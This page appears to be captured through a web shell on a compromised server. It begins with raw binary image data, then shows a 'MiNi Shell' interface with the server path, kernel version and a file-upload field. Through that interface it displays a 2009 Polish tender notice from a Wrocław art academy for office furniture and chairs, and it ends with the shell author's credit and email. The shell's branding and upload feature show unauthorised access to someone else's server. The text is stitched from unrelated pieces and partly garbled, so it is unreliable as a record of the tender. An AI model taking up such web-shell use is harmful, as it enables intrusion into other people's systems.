JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/306006-N-2009.html

<p class="kh_header"><b>Wrocław: Dostawa mebli biurowych ZP-11/09/2009</b><br>
<b>Numer ogłoszenia: 306006 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych ZP-11/09/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli biurowych oraz krzeseł
1.	Biurka - 6 szt.
2.	Biblioteczki - 2 szt.
3.	Szafka z roletą - 1 szt.
4.	Szafki - 3 szt.
5.	Skrzynia - 1 szt.
6.	Meblościanka - 1 szt.
7.	Stół konferencyjny - 1 szt.
8.	Stoły - 17 szt.
9.	Półki naścienne - 2 zestawy
10.	Płyta laminowana - 1 szt.
11.	Stolik komputerowy - 1 szt.
12.	Wózek komputerowy - 2 szt.
13.	Półki wiszące - 3 szt.
14.	Szafy metalowe - 6 szt.
15.	Krzesło obrotowe - 1 szt.
16.	Krzesła metalowe - 24 szt.
17.	Krzesła typu ISO - 20 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.13.40.00-0, 39.13.21.00-7, 39.11.00.00-6, 39.12.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.1.	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.	posiadają niezbędną wiedzą i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP 
2. Sprawdzenie spełnienia w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę, a wymaganych przez Zamawiającego dokumentów i oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków udziału w postępowaniu Wykonawca winien złożyć:
1 oświadczenie o spełnieniu warunków udziału w postępowaniu 
2 oświadczenie o nie podleganiu wykluczeniu z udziału w postępowaniu 
3 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu pl. Polski ?, 50-156 Wrocław, pok. 215a - IIp.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu pl. Polski ?, 50-156 Wrocław - pok. 107 Ip  (sekretariat Kanclerza).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Zadanie nr 1 pkt 1 
Zadanie nr 1 pkt 2
Zadanie nr 1 pkt 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 pkt 1 
1	Biurko  z zaokrąglonymi brzegami skan nr 1	90 x 60 x75	
2	Biblioteczka duża, zamykana na klucz, górne drzwiczki przeszklone (w części przeszklonej 3 półki, w części zamkniętej 2 półki) skan nr 2	90 x 50 x 220	
3	Biblioteczka mała, zamykana na klucz, górne drzwiczki przeszklone (w części szklanej 3 półki, w części zamkniętej 2 półki) skan nr 3	90 x 35 x205	
4	Szafka z roletą, zamykana na klucz (w części przeszklonej 3 półki, w części zamkniętej 2 półki) skan nr 4	60 x 60 x 150	
5	Skrzynia z 4 szufladami skan nr 5	110 x 50 x 60	
6	Meblościanka - część dolna 6 szuflad, część środkowa półki, z jedną częścią przeszkloną zamykaną na klucz, górna część zamykana (w części zamkniętej 2 półki). Meblościanka ma plecy wykonane z takiej samej okleiny jak lico. Skan nr 6	
160 x 50 x 255	
7	Stół konferencyjny na stalowych nogach z zaokrąglonymi krawędziami blatu	220 x 120 x 75	

Zadanie nr 1 pkt 2
1	Stół z blatem z płyty melaminowanej 18 mm, z obrzeżem (pcv) w kolorze ciemnoszarym na wzmacniającej ramie metalowej o przekroju 3 x 3 cm; nogi czarne o przekroju okrągłym średn. 5 cm; na kółkach z blokadą; wysokość całkowita stołu 73,5 cm	
160 x 80 x 73,5
	

2	Stół z blatem z płyty melaminowanej 18 mm, z obrzeżem (pcv) w kolorze ciemnoszarym na wzmacniającej ramie metalowej o przekroju 3 x 3 cm; nogi czarne o przekroju okrągłym średn. 5 cm; na kółkach z blokadą; wysokość całkowita stołu 73,5 cm	
150 x 90 x 73,5
	

3	Stół z blatem z płyty melaminowanej 18 mm, z obrzeżem (pcv) w kolorze ciemnoszarym na wzmacniającej ramie metalowej o przekroju 3 x 3 cm; nogi czarne o przekroju okrągłym średn. 5 cm; na kółkach z blokadą; wysokość całkowita stołu 73,5 cm	
200 x 75 x 73,5
	


4	Stół z blatem z płyty melaminowanej 18 mm, z obrzeżem (pcv) w kolorze ciemnoszarym na wzmacniającej ramie metalowej o przekroju 3 x 3 cm; nogi czarne o przekroju okrągłym średn. 5 cm; na kółkach z blokadą; wysokość całkowita stołu 73,5 cm
	120 x 50 x 73,5 
z dodatkową płytą odbojową o szer. 30 cm montowaną na wysokości 15 cm od ziemi między nogami na dłuższym boku	

5	Szafka wolnostojąca jednodrzwiowa z jedną półką w środku kolor czarny	68 x 37 x  92	
6	Szafka nadstawna otwarta (bez drzwi) ze stałą półką w połowie wysokości i podziałem na dwie części w części dolnej, kolor buk	100 x 50x 70	
7	Półki naścienne na stelażu metalowym - powierzchnia zabudowy ściany dł. 300 cm, wys. 110 cm, 3 poziomy półek, szerokość półki 35 cm, płyta malaminowana kolor ciemnoszary, obrzeże PCV, możliwość regulacji wysokości półek	
---	

8	Półki naścienne na stelażu metalowym - powierzchnia zabudowy ściany dł. 320 cm, wys. 110 cm, 3 poziomy półek, szerokość półki 30 cm, płyta malaminowana kolor ciemnoszary, obrzeże PCV, możliwość regulacji wysokości półek	
---	
9	Płyta laminowana z obrzeżem z PCV z uchwytami do powieszenia na ścianie kolor jasnoszary	90x150 cm	

Zadanie nr 1 pkt 3
1	Stolik komputerowy na stelażu metalowym z profili prostokątnych na kółkach z blokadą. Wysuwana półka pod klawiaturę z blokadą. Powyżej blatu płytsza półka pod monitor z regulacją w pionie w zakresie i poziomie, poniżej blatu - półka na komputer oraz na papier i drukarkę rys. nr 1 	
88/91 x 60 x 103	

2	Biurko - 2 szuflady - jedna zamykana na klucz, szafka zamykana na klucz, półka na klawiaturę, na komputer dostawka na kółkach - rys. nr 2	
105 x 60x 73,5	
3	Stół z okrągłym blatem - wysokość 75 cm, średnica blatu 60 cm, grubość 2-3 cm, jedna noga kolor okleiny pożądany wiśnia, ochra		
4	Biurko - 2 szuflady - jedna zamykana na klucz, szafka zamykana na klucz, wysuwana półka na klawiaturę z blokadą, półka na komputer- rys. 3	120 x 80 x 75	
5	Szafka otwarta z 3 półkami	60 x 20 x 120	
Termin realizacji zamówienia - 21 dni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.10.00.00-3, 39.13.40.00-0, 39.13.21.00-7, 39.12.11.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Biurko  - blaty biurek posadowione na stelażu metalowym z pionowym i poziomym okablowaniem. Stopa wykonana z polerowanego aluminium 	
180 x 80 x 74	
2	Wózek komputerowy - podstawa na komputer na kółkach	22 x 47 x 148	
3	Półka wisząca 120 x 39 x 43	
Termin realizacji zamówienia - 21 dni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.11.00-7, 39.13.40.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3
Meble metalowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szafa metalowa-5 szufladowa do przechowywania plakatów formatu A0 z podstawą. Szuflady na prowadnicach kulkowych o pełnym wysuwie, zabezpieczone przed wypadaniem. Szafa zamykana zamkiem centralnym. Obciążenie każdej z szuflad min. 50 kg - rys. 1	
425 x 1315 x 920	
2	Szafka metalowa szufladowiec:
moduł 1 do przechowywania ceramiki nośność szuflady min. 10 kg , możliwość wysuwania całej szuflady w celu pobrania próbek z ostatniego rzędu, blokada przed wypadaniem szuflad, 7 szuflad-wysokość 6 szuflad po 10 cm każda, wysokość dolnej szuflady-uzupełnienie wymiarów, tak aby wysokość całej szafki nie przekraczała 80 cm, szerokość modułu 120 cm (60 cm+60 cm)-rys. 2	

120 x 60 x 80	
3	Szafka metalowa szufladowiec
moduł 2 do przechowywania elektronarzędzi-zamek centralny; cztery szuflady, pierwsza szuflada od góry wysokość 10 cm, druga i trzecia po 20 cm, ostatnia uzupełnienie wymiarów, tak aby wysokość całej szafki nie przekraczała 80 cm-rys. 2	
80 x 60 x 80	
4	Szafa metalowa bez drzwi 	180 x 80 x 40	
Termin realizacji zamówienia - 21 dni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4
Krzesła.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Krzesło obrotowe - wysokie profilowane oparcie, regulacja wysokości oparcia, kąta odchylenia oparcia, wysokość siedziska regulowana za pomocą podnośnika pneumatycznego, amortyzacja siedziska, podłokietniki poliuretanowe, kółka do powierzchni twardych, samohamujące (typu Prestige GTP), tkanina C, kolor tapicerki do uzgodnienia przed dostawą	
2	Krzesła metalowe składane czarne, siedzisko i oparcie miękkie, obicie derma czarna. Zamieszczone zdjęcie ma charakter poglądowy, Zamawiający dopuszcza złożenie w ofercie krzesła, które odbiega od wzoru na poniższym rysunku, ale jest zgodne z opisem (zmiany mogą dotyczyć w szczególności proporcji oparcia, konstrukcji nóg - tylne nogi krzesła mogą być w takiej konstrukcji jak przednie) 	
3	Krzesło typu ISO - stelaż metalowy czarny, siedzisko i oparcie czarny plastik, możliwość składowania w stosie, waga poniżej 5 kg  	
Termin realizacji zamówienia - 21 dni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com